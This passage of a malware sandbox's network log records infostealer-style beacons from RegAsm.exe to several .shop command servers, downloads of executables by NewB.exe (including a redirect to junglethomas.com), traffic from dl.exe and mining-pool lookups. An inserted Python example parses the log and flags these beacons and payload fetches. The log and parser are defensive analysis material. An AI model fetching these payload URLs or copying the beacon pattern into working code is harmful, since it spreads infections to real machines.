                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb866dcd643d-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      16.95.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      16.95.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      60.141.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      60.141.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      185.205.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      headraisepresidensu.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      headraisepresidensu.shop
                                                                                      IN A
                                                                                      Response
                                                                                      headraisepresidensu.shop
                                                                                      IN A
                                                                                      104.21.50.137
                                                                                      headraisepresidensu.shop
                                                                                      IN A
                                                                                      172.67.206.145
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://headraisepresidensu.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.50.137:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: headraisepresidensu.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=r18h1qo5cferb6ugh3dlftsldk; expires=Sat, 07-Sep-2024 11:48:21 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WniHbrVptuCVlT8Qs0xiH2CRxfJhMyifztzRHjOrmGFGx9OHwd3Fgs3x4zvAvua%2FLD4DCklTnMH6%2FRxLia6GwlMsSQgV48p3JG%2BAaUErbzX9kIJwbG32D216socBuhJ0JYN6Cd4K9YJNpMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb89a8de7713-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      file-file-host6.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      Response
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      5.101.50.183
                                                                                    • flag-us
                                                                                      DNS
                                                                                      file-file-host6.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      Response
                                                                                      file-file-host6.com
                                                                                      IN A
                                                                                      5.101.50.183
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://file-file-host6.com/downloads/toolspub1.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      5.101.50.183:80
                                                                                      Request
                                                                                      GET /downloads/toolspub1.exe HTTP/1.1
                                                                                      Host: file-file-host6.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.2
                                                                                      Date: Tue, 14 May 2024 18:01:42 GMT
                                                                                      Content-Type: application/x-msdos-program
                                                                                      Content-Length: 229888
                                                                                      Connection: close
                                                                                      Last-Modified: Tue, 14 May 2024 18:01:02 GMT
                                                                                      ETag: "38200-6186dc8f1da04"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-us
                                                                                      DNS
                                                                                      appetitesallooonsj.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      appetitesallooonsj.shop
                                                                                      IN A
                                                                                      Response
                                                                                      appetitesallooonsj.shop
                                                                                      IN A
                                                                                      104.21.48.123
                                                                                      appetitesallooonsj.shop
                                                                                      IN A
                                                                                      172.67.151.60
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://appetitesallooonsj.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.48.123:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: appetitesallooonsj.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=kj03q2h1q4j31ski1trmaq9ju6; expires=Sat, 07-Sep-2024 11:48:23 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1qR%2BxFhyUtTCtWq%2Br2Sdvi4OG2ZIEmRTOx9mmYCWWHA7Hy042rHYj%2BRaIDVRdrA3sLzC9UfR35eD4qFQ2XWJUGPw9Y%2Bi2Hr7nOO6kuV5OUe2HFa1QRpLOnAfPNEC2AdMmLQtS0FDYkvGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb938f3471d8-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      137.50.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      137.50.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      arkonsacom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      183.50.101.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      arkonsacom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      parrotflight.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      parrotflight.com
                                                                                      IN A
                                                                                      Response
                                                                                      parrotflight.com
                                                                                      IN A
                                                                                      172.67.187.204
                                                                                      parrotflight.com
                                                                                      IN A
                                                                                      104.21.84.71
                                                                                    • flag-us
                                                                                      GET
                                                                                      https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      172.67.187.204:443
                                                                                      Request
                                                                                      GET /4767d2e713f2021e8fe856e3ea638b58.exe HTTP/1.1
                                                                                      Host: parrotflight.com
                                                                                      Response
                                                                                      HTTP/1.1 307 Temporary Redirect
                                                                                      Date: Tue, 14 May 2024 18:01:45 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Location: https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCzRFiPYhSiSaQ6LEhSDJ7i0neI%2FmMiz%2FggZy0Pg94xK1ClJIbEodYkf2aQlPCPy3uW8BIORKj0kLJrn7Ahwj2GJevfc%2FojTLWhsBVY5gCTNylx0PwdbZ2IYQjSrginaoXWV"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9becb971c6-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      minorittyeffeoos.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      minorittyeffeoos.shop
                                                                                      IN A
                                                                                      Response
                                                                                      minorittyeffeoos.shop
                                                                                      IN A
                                                                                      188.114.96.2
                                                                                      minorittyeffeoos.shop
                                                                                      IN A
                                                                                      188.114.97.2
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://minorittyeffeoos.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      188.114.96.2:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: minorittyeffeoos.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:45 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=jgm13t3f21c49jv0so7sunmvlc; expires=Sat, 07-Sep-2024 11:48:23 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yg8ZTTWkLVMNElgowM%2F1kknDsHp05ureumhIMEE9%2BSq1R7ogZGteG%2Bl4vUV3RdeQKpGJuULOGt51g7Wuv0vZZci2FpBfhbG0T8Uv5mBicORNiMg8EtNeyxRPyzcNch9hDmmnbcE0%2B9Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9789786316-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
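The entries above are the raw sandbox log. As an added example that is not part of this report, the Python below parses events in this exact layout (the bullet, type, target, optional process, remote address, then the Request and Response lines) and flags the two behaviours the log shows: RegAsm.exe posting an 8-byte form body to /api with a browser User-Agent and getting a fresh PHPSESSID back, and NewB.exe fetching executables, including the 307 hop from parrotflight.com to junglethomas.com. The sample text is transcribed from events above and trimmed to the headers the checks read; the 16-byte body threshold, the browser process list and the content types treated as executable are this example's assumptions, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the report's own layout, transcribed from events above and trimmed.
SAMPLE = """\
• flag-us
POST
https://headraisepresidensu.shop/api
RegAsm.exe
Remote address:
104.21.50.137:443
Request
POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Response
Set-Cookie: PHPSESSID=r18h1qo5cferb6ugh3dlftsldk; path=/
• flag-ru
GET
http://file-file-host6.com/downloads/toolspub1.exe
NewB.exe
Remote address:
5.101.50.183:80
Request
GET /downloads/toolspub1.exe HTTP/1.1
Response
Content-Type: application/x-msdos-program
• flag-us
GET
https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe
NewB.exe
Remote address:
172.67.187.204:443
Request
GET /4767d2e713f2021e8fe856e3ea638b58.exe HTTP/1.1
Response
HTTP/1.1 307 Temporary Redirect
Location: https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe
"""

@dataclass
class NetEvent:
    kind: str                  # DNS, GET or POST
    target: str                # queried name or requested URL
    process: Optional[str]     # originating process, when the sandbox attributed one
    remote: str                # ip:port
    request: list = field(default_factory=list)
    response: list = field(default_factory=list)

    def header(self, side: str, name: str) -> Optional[str]:
        for line in self.request if side == "req" else self.response:
            if line.lower().startswith(name.lower() + ":"):
                return line.split(":", 1)[1].strip()
        return None

def parse_events(text: str) -> list:
    events = []
    for block in re.split(r"^• flag-\w+$", text, flags=re.M):   # one block per bullet
        lines = [l.strip() for l in block.splitlines() if l.strip()]
        if len(lines) < 6 or lines[0] not in ("DNS", "GET", "POST"):
            continue
        has_proc = lines[2] != "Remote address:"                 # process line is optional
        process, remote = (lines[2], lines[4]) if has_proc else (None, lines[3])
        body = lines[6:] if has_proc else lines[5:]              # everything after 'Request'
        cut = body.index("Response") if "Response" in body else len(body)
        events.append(NetEvent(lines[0], lines[1], process, remote, body[:cut], body[cut + 1:]))
    return events

BROWSERS = ("chrome", "msedge", "firefox", "iexplore")   # assumption: processes allowed a browser UA

def c2_beacons(events: list) -> list:
    """Check-in shape seen above: POST /api with a tiny form body and a browser
    User-Agent, sent by a non-browser process, answered with a PHPSESSID cookie."""
    hits = []
    for e in events:
        if e.kind != "POST" or not e.target.endswith("/api") or not e.process:
            continue
        ua = e.header("req", "User-Agent") or ""
        if (int(e.header("req", "Content-Length") or 0) <= 16 and ua.startswith("Mozilla/")
                and not e.process.lower().startswith(BROWSERS)
                and "PHPSESSID=" in (e.header("resp", "Set-Cookie") or "")):
            hits.append((e.process, e.target))
    return hits

def payload_fetches(events: list) -> list:
    """Executable bodies served to a non-browser process, and the 307 hop above
    that parks the real payload host behind a first, disposable URL."""
    out = []
    for e in events:
        if e.kind != "GET" or not e.process:
            continue
        ctype = e.header("resp", "Content-Type") or ""
        loc = e.header("resp", "Location")
        if ctype.startswith(("application/x-msdos-program", "application/octet-stream")):
            out.append((e.process, e.target, "executable body"))
        elif loc and loc.split("/")[2] != e.target.split("/")[2]:   # redirect leaves the host
            out.append((e.process, e.target, "redirect to " + loc.split("/")[2]))
    return out
```

Run `c2_beacons(parse_events(SAMPLE))` and `payload_fetches(parse_events(SAMPLE))` on the sample; on a full report, the same functions give a process-to-domain map that is usually more useful than the URL list alone, because the same RegAsm.exe beacon walks several .shop domains in turn and the downloader's first URL is not where the payload actually lives.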
                                                                                    • flag-us
                                                                                      DNS
                                                                                      prideconstituiiosjk.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      prideconstituiiosjk.shop
                                                                                      IN A
                                                                                      Response
                                                                                      prideconstituiiosjk.shop
                                                                                      IN A
                                                                                      104.21.92.157
                                                                                      prideconstituiiosjk.shop
                                                                                      IN A
                                                                                      172.67.195.106
                                                                                    • flag-us
                                                                                      DNS
                                                                                      123.48.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      123.48.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • US
                                                                                      DNS
                                                                                      204.187.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      204.187.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • US
                                                                                      DNS
                                                                                      2.96.114.188.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      2.96.114.188.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • US
                                                                                      DNS
                                                                                      67.179.250.142.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      67.179.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      67.179.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      par21s19-in-f31.1e100.net
                                                                                    • US
                                                                                      POST
                                                                                      https://prideconstituiiosjk.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.92.157:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: prideconstituiiosjk.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:45 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=70h1j165f60vm0fq1sopgu70sn; expires=Sat, 07-Sep-2024 11:48:24 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FjzT3cJGVdzUBvbialLw4Ant7DrYC4ps78OpP8iprnQLKc9O4qdtwUokkV82Ogyn%2BIlb%2B%2FlcIIrMuHvYCQ8l7rWh0pduVCBus2I2G3q9nt8fZD%2FOBXt1th9z5NO9StQVtQ5PV6SckzpQP8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9b6e856518-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • US
                                                                                      DNS
                                                                                      junglethomas.com
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      junglethomas.com
                                                                                      IN A
                                                                                      Response
                                                                                      junglethomas.com
                                                                                      IN A
                                                                                      104.21.92.190
                                                                                      junglethomas.com
                                                                                      IN A
                                                                                      172.67.197.33
                                                                                    • US
                                                                                      GET
                                                                                      https://junglethomas.com/ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      104.21.92.190:443
                                                                                      Request
                                                                                      GET /ab6c5b0141ae7b82616164b5c7473c92/4767d2e713f2021e8fe856e3ea638b58.exe HTTP/1.1
                                                                                      Host: junglethomas.com
                                                                                      Connection: Keep-Alive
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:46 GMT
                                                                                      Content-Type: application/x-ms-dos-executable
                                                                                      Content-Length: 4308872
                                                                                      Connection: keep-alive
                                                                                      Last-Modified: Tue, 14 May 2024 17:40:54 GMT
                                                                                      Cache-Control: max-age=14400
                                                                                      CF-Cache-Status: MISS
                                                                                      Accept-Ranges: bytes
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fUmRyu1NVuTIio7N9qeiz8W4m35O7wWUJB9GGZE6aD0UmX3b8WPa1zVQ%2BYkKnV7NT%2B7%2B1lqpW6JIf6JhbNdwCTWkw%2F6oLHEYR7Qxp32xBZmJ1Lq83VB%2BKEJzOuJ1nFhQ%2FY3v"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb9e48db4182-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • US
                                                                                      DNS
                                                                                      157.92.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      157.92.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • US
                                                                                      DNS
                                                                                      190.92.21.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      190.92.21.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • DE
                                                                                      GET
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      dl.exe
                                                                                      Remote address:
                                                                                      185.172.128.90:80
                                                                                      Request
                                                                                      GET /cpa/name.php HTTP/1.1
                                                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                      User-Agent: 1
                                                                                      Host: 185.172.128.90
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                    • US
                                                                                      DNS
                                                                                      90.128.172.185.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      90.128.172.185.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • US
                                                                                      DNS
                                                                                      xmr.2miners.com
                                                                                      850308.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      xmr.2miners.com
                                                                                      IN A
                                                                                      Response
                                                                                      xmr.2miners.com
                                                                                      IN A
                                                                                      162.19.139.184
                                                                                    • US
                                                                                      DNS
                                                                                      67.65.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      67.65.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • US
                                                                                      DNS
                                                                                      184.139.19.162.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      184.139.19.162.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      184.139.19.162.in-addr.arpa
                                                                                      IN PTR
                                                                                      p06.2miners.com
                                                                                    • US
                                                                                      DNS
                                                                                      249.197.17.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      249.197.17.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      249.197.17.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-17-197-249.deploy.static.akamaitechnologies.com
                                                                                    • DE
                                                                                      GET
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      Remote address:
                                                                                      185.172.128.90:80
                                                                                      Request
                                                                                      GET /cpa/name.php HTTP/1.1
                                                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                      User-Agent: 1
                                                                                      Host: 185.172.128.90
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                    • US
                                                                                      DNS
                                                                                      172.210.232.199.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      172.210.232.199.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • US
                                                                                      DNS
                                                                                      22.236.111.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      22.236.111.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • DE
                                                                                      GET
                                                                                      http://185.172.128.90/cpa/name.php
                                                                                      Remote address:
                                                                                      185.172.128.90:80
                                                                                      Request
                                                                                      GET /cpa/name.php HTTP/1.1
                                                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                      User-Agent: 1
                                                                                      Host: 185.172.128.90
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                    • US
                                                                                      DNS
                                                                                      zeph-eu2.nanopool.org
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      Response
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      163.172.171.111
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.210.150.92
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.15.89.13
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.68.137.186
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.195.43.17
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.15.61.114
                                                                                      zeph-eu2.nanopool.org
                                                                                      IN A
                                                                                      51.195.138.197
                                                                                    • US
                                                                                      DNS
                                                                                      17.43.195.51.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      17.43.195.51.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      17.43.195.51.in-addr.arpa
                                                                                      IN PTR
                                                                                      vps-4c5eb1ca.vps.ovh.net
                                                                                    • 204.79.197.237:443
    URL: https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
    Protocol: tls, http2
    Bytes sent / received: 2.6kB / 9.1kB
    Packets sent / received: 19 / 16
    HTTP Request: GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
    HTTP Response: 204
